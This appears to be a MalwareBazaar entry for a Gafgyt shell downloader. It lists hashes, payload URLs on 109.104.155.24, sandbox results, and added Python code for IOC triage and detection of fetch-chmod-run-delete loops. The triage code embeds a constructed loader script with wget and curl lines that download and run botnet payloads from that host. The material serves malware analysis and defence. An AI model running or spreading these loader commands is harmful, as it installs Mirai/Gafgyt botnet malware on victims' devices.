MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 280b5a76d8c2e870616db131e8d3942e38dddb16bb21a3e7725e0a08aec01274. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Gafgyt


Vendor detections: 5



SHA256 hash: 280b5a76d8c2e870616db131e8d3942e38dddb16bb21a3e7725e0a08aec01274
SHA3-384 hash: e9e30d543fb0e9c38c82716ad4cd7bf5cf5c3595da33069968fc67e9d6018b54a9d11b89c6496a31970eb3308e5eeed4
SHA1 hash: cb22bda37d8843364461e50d756dda4b36466d6a
MD5 hash: fe0904dca6ecb54a5acdcd1f7970a641
humanhash: mississippi-august-winner-chicken
File name: lilin.sh
Signature: Gafgyt
File size: 650 bytes
First seen: 2026-01-28 16:28:16 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 12:CLJoZDSLJhHWNCLsySLshHWNCLPBzvSLPBzMHWNCLPnIjDSLPnIMHWNCLPiDSLPQ:CCZeTWNCw5wRWNC9z69zGWNCzJzhWNC4
TLSH: T1E4F0BFFF01A04CAD2144FA4AF9E34E79A81A69DD54C60F4C9A9F2C393C8D9187835F5D
Magika: batch
Reporter: abuse_ch
Tags: sh
IOCs: URLs contacted by this sample and the payloads served from them

URL                         Malware sample (SHA256 hash)                                       Signature  Tags
http://109.104.155.24/mips  e21b7bea60a9530514cc047e69acc0a4f8fcd4aa0b0b740b44420536df8db05d   Gafgyt     32-bit elf gafgyt Mozi
http://109.104.155.24/mpsl  10a7aff25c88eb3fb4ce17dbdd1d78e941b3c4696935f2843afae1a7403c73d3   Mirai      elf mirai ua-wget
http://109.104.155.24/arm4  ac0de66ad392299c321c00db0b0f010ff5d63a18392364b8f07ea8da4f94c52f   Mirai      elf mirai ua-wget
http://109.104.155.24/arm5  5a2f439cbeb1481de5ee95086d4119fbf28a8d8b89ae9a93ee9dd45472cf5f78   Mirai      elf mirai ua-wget
http://109.104.155.24/arm7  fefec7b2d044fee96b0d7315c1a648a64c78fd6cbb1753c7d90e027676379e7e   Mirai      elf mirai ua-wget
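The URL table above maps each stage-2 URL to the payload served from it, which is what a responder wants to pivot on when a downloader script like this one turns up. The following Python is an added example (not code from MalwareBazaar, abuse.ch or the sample's author) that extracts fetch URLs from a downloader script, looks them up in that table, and reports the hosts and any URLs the table does not know. The script text inside it is constructed for illustration, modelled on the process tree recorded for this sample (fetch from 109.104.155.24, chmod, run, rm, once per architecture); the real lilin.sh is not reproduced, and the x86 URL and the curl line are invented to show an unknown IOC and a second fetch tool.

```python
"""Static triage of a Gafgyt/Mirai-style downloader script against this entry's IOCs.

Added example, not code from MalwareBazaar or abuse.ch. SAMPLE_SCRIPT is a
constructed stand-in (NOT the real lilin.sh). KNOWN_PAYLOADS is copied from
the entry's URL table.
"""
import re
from urllib.parse import urlparse

# URL -> (SHA256 of the payload served there, signature), from the IOC table above.
KNOWN_PAYLOADS = {
    "http://109.104.155.24/mips": ("e21b7bea60a9530514cc047e69acc0a4f8fcd4aa0b0b740b44420536df8db05d", "Gafgyt"),
    "http://109.104.155.24/mpsl": ("10a7aff25c88eb3fb4ce17dbdd1d78e941b3c4696935f2843afae1a7403c73d3", "Mirai"),
    "http://109.104.155.24/arm4": ("ac0de66ad392299c321c00db0b0f010ff5d63a18392364b8f07ea8da4f94c52f", "Mirai"),
    "http://109.104.155.24/arm5": ("5a2f439cbeb1481de5ee95086d4119fbf28a8d8b89ae9a93ee9dd45472cf5f78", "Mirai"),
    "http://109.104.155.24/arm7": ("fefec7b2d044fee96b0d7315c1a648a64c78fd6cbb1753c7d90e027676379e7e", "Mirai"),
}

# Constructed downloader script (NOT the real lilin.sh). The x86 URL and the
# curl line are invented to exercise the unknown-IOC and second-fetcher paths.
SAMPLE_SCRIPT = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.155.24/mips -O lilin.mips; chmod +x lilin.mips; ./lilin.mips; rm -rf lilin.mips
wget http://109.104.155.24/mpsl -O lilin.mpsl; chmod +x lilin.mpsl; ./lilin.mpsl; rm -rf lilin.mpsl
wget http://109.104.155.24/arm4 -O lilin.arm4; chmod +x lilin.arm4; ./lilin.arm4; rm -rf lilin.arm4
curl -s http://109.104.155.24/arm7 -o lilin.arm7; chmod 777 lilin.arm7; ./lilin.arm7; rm -rf lilin.arm7
wget http://109.104.155.24/x86 -O lilin.x86; chmod +x lilin.x86; ./lilin.x86; rm -rf lilin.x86
"""

URL_RE = re.compile(r"https?://[^\s'\";|&)>]+")
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")


def extract_urls(script):
    """Distinct URLs in first-seen order."""
    seen = []
    for url in URL_RE.findall(script):
        if url not in seen:
            seen.append(url)
    return seen


def classify(script):
    """URL -> (sha256, signature) from the IOC table, or None when the URL is new."""
    return {url: KNOWN_PAYLOADS.get(url) for url in extract_urls(script)}


def fetch_hosts(script):
    """host:port of every URL that appears on a line with a fetch tool (loader/C2 hosts to block)."""
    hosts = set()
    for line in script.splitlines():
        if FETCH_RE.search(line):
            for url in URL_RE.findall(line):
                parsed = urlparse(url)
                hosts.add(f"{parsed.hostname}:{parsed.port or 80}")
    return hosts


def dropper_lines(script):
    """Lines that fetch, chmod and rm in one go: the per-architecture pattern in the behaviour graph."""
    return sum(
        1 for line in script.splitlines()
        if FETCH_RE.search(line) and "chmod" in line and re.search(r"\brm\b", line)
    )


def triage(script):
    """Known payloads by signature, unknown URLs to pivot on, hosts, and loop count."""
    matched = classify(script)
    return {
        "known": {url: hit[1] for url, hit in matched.items() if hit is not None},
        "unknown": [url for url, hit in matched.items() if hit is None],
        "hosts": fetch_hosts(script),
        "dropper_lines": dropper_lines(script),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

Unknown URLs are the output to act on: they are payloads not yet in the table and candidates for fetching into a sandbox and submitting with their SHA256. The host set is what goes into a network block list; the dropper-line count distinguishes a multi-architecture IoT loader from an installer that fetches one file.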

Intelligence


File Origin
# of uploads: 1
# of downloads: 32
Origin country: DE
Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: base64 bash busybox evasive lolbin mirai
Status: terminated
Behavior Graph (process tree recovered from the graph data; the image itself is not reproduced here):
/usr/bin/sudo (pid 2898)
  execve /tmp/sample.bin (pid 2899)
    the following cycle runs five times (dash/wget pids 2900/2901, 3016/3017, 3185/3186, 3299/3300, 3461/3462; chmod pids 3009, 3179, 3291, 3454, 3605; rm pids 3015, 3182, 3297, 3460, 3610):
      clone /usr/bin/dash -> execve /usr/bin/wget (net, send-data, write-file; 133 B sent to 109.104.155.24:80)
      execve /usr/bin/chmod
      clone /usr/bin/dash
      execve /usr/bin/rm (delete-file)
Verdict: Malicious
Threat: Trojan-Downloader.Shell.Agent

Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
  Modifies registry class
  Suspicious use of SetWindowsHookEx
  Enumerates physical storage devices
Note: these three behaviours are Windows API findings reported for a 650-byte Linux shell script; treat this vendor's score and behaviour list as noise for this sample.
Please note that we are no longer able to provide a coverage score for Virus Total.
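The behaviour graph above is the dynamic signature of this loader: the script fetches a payload from 109.104.155.24:80, marks it executable, tries to run it, deletes it, and repeats for the next architecture. As an added example (not code from MalwareBazaar or the sandbox that produced the graph), the following Python turns that into a detection over a stream of process events: shell wrappers such as dash are collapsed onto the process that owns them, and a fetch -> chmod -> rm cycle driven repeatedly by one owner is flagged. The EVENTS list is constructed: the pids, executables and destination come from the graph, while the timestamps, the parents of sudo and the benign admin activity are invented for illustration.

```python
"""Detect the fetch -> chmod -> (run) -> delete loop from this entry's behaviour graph.

Added example, not code from MalwareBazaar or any sandbox vendor. EVENTS is
constructed: pids, executables and 109.104.155.24:80 mirror the graph;
timestamps, sudo's parent and the benign bash/wget/tar activity are invented.
"""
from collections import defaultdict

CYCLES = [  # (dash, wget, chmod, dash, rm) pids as shown in the behaviour graph
    (2900, 2901, 3009, 3011, 3015),
    (3016, 3017, 3179, 3180, 3182),
    (3185, 3186, 3291, 3293, 3297),
    (3299, 3300, 3454, 3456, 3460),
    (3461, 3462, 3605, 3607, 3610),
]


def _build_events():
    """Event = (ts, pid, ppid, exe, net_dst); only exec events are modelled."""
    ev = [(0.0, 2898, 1, "/usr/bin/sudo", ""), (0.1, 2899, 2898, "/tmp/sample.bin", "")]
    t = 1.0
    for dash1, wget, chmod, dash2, rm in CYCLES:
        ev += [
            (t, dash1, 2899, "/usr/bin/dash", ""),
            (t + 0.1, wget, dash1, "/usr/bin/wget", "109.104.155.24:80"),  # net, send-data, write-file
            (t + 0.5, chmod, 2899, "/usr/bin/chmod", ""),
            (t + 0.6, dash2, 2899, "/usr/bin/dash", ""),                   # attempt to run the payload
            (t + 0.7, rm, 2899, "/usr/bin/rm", ""),                        # delete-file
        ]
        t += 1.0
    # Constructed benign activity: one fetch with no chmod/rm loop; must not fire.
    ev += [
        (20.0, 4000, 1, "/usr/bin/bash", ""),
        (20.1, 4001, 4000, "/usr/bin/wget", "203.0.113.5:443"),
        (20.5, 4002, 4000, "/usr/bin/tar", ""),
    ]
    return sorted(ev)


EVENTS = _build_events()

SHELLS = {"/bin/sh", "/usr/bin/sh", "/bin/dash", "/usr/bin/dash", "/bin/bash", "/usr/bin/bash"}
FETCHERS = {"wget", "curl", "tftp", "ftpget"}


def _owner(ppid, parent, exe):
    """Attribute an exec to its nearest non-shell ancestor, collapsing dash/sh wrappers."""
    p = ppid
    while exe.get(p) in SHELLS and p in parent:
        p = parent[p]
    return p


def detect_fetch_exec_delete(events):
    """Per owning process: fetch->chmod->rm cycles completed and hosts fetched from."""
    parent, exe = {}, {}
    state = defaultdict(lambda: {"exe": None, "cycles": 0, "hosts": set(), "phase": 0})
    for _ts, pid, ppid, path, net in sorted(events):
        parent[pid], exe[pid] = ppid, path
        owner = _owner(ppid, parent, exe)
        s = state[owner]
        s["exe"] = exe.get(owner)
        name = path.rsplit("/", 1)[-1]
        if name in FETCHERS:            # phase 1: something was downloaded
            s["phase"] = 1
            if net:
                s["hosts"].add(net)
        elif name == "chmod" and s["phase"] == 1:   # phase 2: it was made executable
            s["phase"] = 2
        elif name == "rm" and s["phase"] == 2:      # cycle closed: the artefact was deleted
            s["cycles"] += 1
            s["phase"] = 0
    return {pid: s for pid, s in state.items() if s["cycles"] or s["hosts"]}


def flagged(events, min_cycles=2):
    """Owners repeating the loop at least min_cycles times; a single cycle is often a legitimate installer."""
    return sorted(pid for pid, s in detect_fetch_exec_delete(events).items() if s["cycles"] >= min_cycles)


if __name__ == "__main__":
    for pid, s in detect_fetch_exec_delete(EVENTS).items():
        print(pid, s["exe"], s["cycles"], sorted(s["hosts"]))
    print("flagged:", flagged(EVENTS))
```

Collapsing the shell wrappers matters: in the graph every wget is a grandchild of sample.bin via a fresh dash, so a detector that only looks at direct children would see five unrelated one-shot downloads and never close a cycle.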

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:ach_202412_suspect_bash_script
Author:abuse.ch
Description:Detects suspicious Linux bash scripts

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download
Signature: Gafgyt
File type: sh
SHA256: 280b5a76d8c2e870616db131e8d3942e38dddb16bb21a3e7725e0a08aec01274 (this sample)

Comments